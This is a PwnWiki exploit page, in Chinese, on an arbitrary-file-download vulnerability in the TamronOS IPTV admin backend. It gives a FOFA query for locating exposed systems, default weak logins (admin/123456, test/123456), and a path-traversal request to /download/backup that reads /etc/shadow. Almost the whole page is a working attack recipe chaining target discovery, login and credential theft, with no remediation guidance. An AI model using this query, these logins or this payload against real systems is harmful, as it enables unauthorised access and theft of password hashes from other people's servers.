TamronOS IPTV系統後台任意文件下載漏洞

From PwnWiki

Revision as of 09:31, 13 June 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎English • ‎中文（中国大陆）‎

漏洞影響

TamronOS IPTV V5 3.6.6

FOFA

title="TamronOS IPTV系统"

弱口令

admin/123456

test/123456

漏洞利用

系統設置 -- 數據庫自動備份，下載文件並且抓包。修改參數，Payload如下：

GET /download/backup?name=./../../../../../etc/shadow

Retrieved from "https://pwnwiki.com/index.php?title=TamronOS_IPTV系統後台任意文件下載漏洞&oldid=4952"